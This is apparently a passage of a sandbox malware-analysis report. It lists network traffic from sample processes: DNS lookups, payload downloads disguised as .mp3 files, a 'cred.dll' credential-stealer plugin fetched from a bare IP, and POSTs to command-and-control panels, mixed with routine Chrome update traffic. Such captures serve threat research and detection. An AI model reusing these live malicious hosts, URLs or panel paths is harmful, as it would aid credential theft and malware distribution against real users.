                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 254
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:02 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:02 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ad0f8b0000c761f1a9f000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=37IndqeRD71Idk3UNuK6MEUWu0B3IhgGSYmDAsfEHF9ebhNVcEfE4UUh2N%2BEc5gAQAVdd%2F%2Bcw9WTaDSHhZNvkZhq5rxnVGEIGsTJDuhArt1lQ7VXOg0MYcXCbCZuXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668617927eb4c761-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iplis.ru
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iplis.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iplis.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.99.66.31
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplis.ru/1S3fd7.mp3
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1S3fd7.mp3 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: iplis.ru
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:04 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=ejuru0d9nfado0aipfn5bmkee4; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=193.110.95.34; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837967; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 10
                                                                                                                                                                                        whoami: 4fbe470fe4cdccc3f36e2d118c6af547fd4258d04a0802365c46793069702372
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplis.ru/1G8Fx7.mp3
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1G8Fx7.mp3 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: iplis.ru
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:05 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=q4ktqpi5116hl975forfrau9t7; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=193.110.95.34; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837966; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 16
                                                                                                                                                                                        whoami: 4fbe470fe4cdccc3f36e2d118c6af547fd4258d04a0802365c46793069702372
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 348
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:08 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.binance.com/favicon.ico
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        52.84.150.16:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /favicon.ico HTTP/2.0
                                                                                                                                                                                        host: www.binance.com
                                                                                                                                                                                        accept: */*
                                                                                                                                                                                        accept-encoding: gzip, deflate, br
                                                                                                                                                                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                                                                                                                        dnt: 1
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/2.0 404
                                                                                                                                                                                        content-type: text/html
                                                                                                                                                                                        date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        server: Tengine
                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                        etag: W/"60deb94f-197a"
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        referrer-policy: origin-when-cross-origin
                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                        content-encoding: gzip
                                                                                                                                                                                        x-cache: Error from cloudfront
                                                                                                                                                                                        via: 1.1 a8e7255a7d8a262e371be5d5c9ca1106.cloudfront.net (CloudFront)
                                                                                                                                                                                        x-amz-cf-pop: ATL56-C1
                                                                                                                                                                                        x-amz-cf-id: gXBEWBcBdqg3KLNwBBYFV7Eo-rIxikTBTjR238D0APGIh0ECO3PIpA==
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        safebrowsing.googleapis.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.138
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=291397&key=a03dc225caaa0cfbcbcb07b734813bd3
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=291397&key=a03dc225caaa0cfbcbcb07b734813bd3 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:17:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Sat, 26 Jun 2021 10:32:28 GMT
                                                                                                                                                                                        ETag: "1f200-5c5a8c5d80700"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 127488
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.msftconnecttest.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        v4ncsi.msedge.net
                                                                                                                                                                                        v4ncsi.msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        ncsi.4-c-0003.c-msedge.net
                                                                                                                                                                                        ncsi.4-c-0003.c-msedge.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        4-c-0003.c-msedge.net
                                                                                                                                                                                        4-c-0003.c-msedge.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        13.107.4.52
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        edgedl.me.gvt1.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        edgedl.me.gvt1.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        edgedl.me.gvt1.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        34.104.35.123
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 5558
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "748e44"
                                                                                                                                                                                        last-modified: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72970
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        Range: bytes=0-1119
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 1120
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "748e44"
                                                                                                                                                                                        last-modified: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72970
                                                                                                                                                                                        content-range: bytes 0-1119/5558
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        Range: bytes=1120-1153
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 34
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "748e44"
                                                                                                                                                                                        last-modified: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72975
                                                                                                                                                                                        content-range: bytes 1120-1153/5558
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        Range: bytes=1154-1297
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 144
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "748e44"
                                                                                                                                                                                        last-modified: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72981
                                                                                                                                                                                        content-range: bytes 1154-1297/5558
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        Range: bytes=1298-2802
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 1505
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "748e44"
                                                                                                                                                                                        last-modified: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72986
                                                                                                                                                                                        content-range: bytes 1298-2802/5558
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /edgedl/release2/chrome_component/APXXLABkvVhhXtYF5CAJK8E_43/G7yvLIv4RYlDG8Af2QDjoQ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        If-Unmodified-Since: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        Range: bytes=2803-5557
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 206 Partial Content
                                                                                                                                                                                        accept-ranges: bytes
                                                                                                                                                                                        content-disposition: attachment
                                                                                                                                                                                        content-length: 2755
                                                                                                                                                                                        content-security-policy: default-src 'none'
                                                                                                                                                                                        content-type: application/octet-stream
                                                                                                                                                                                        etag: "748e44"
                                                                                                                                                                                        last-modified: Tue, 13 Oct 2020 23:46:14 GMT
                                                                                                                                                                                        server: Google-Edge-Cache
                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                        date: Thu, 01 Jul 2021 11:01:03 GMT
                                                                                                                                                                                        age: 72988
                                                                                                                                                                                        content-range: bytes 2803-5557/5558
                                                                                                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                                        cache-control: public,max-age=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        HEAD
                                                                                                                                                                                        http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        34.104.35.123:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        HEAD /edgedl/release2/chrome_component/AIQWwBRSWwfx2JCxD0aw30k_2657/I-4-aBwqaCFG5rMUT0QDpg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                        Host: edgedl.me.gvt1.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
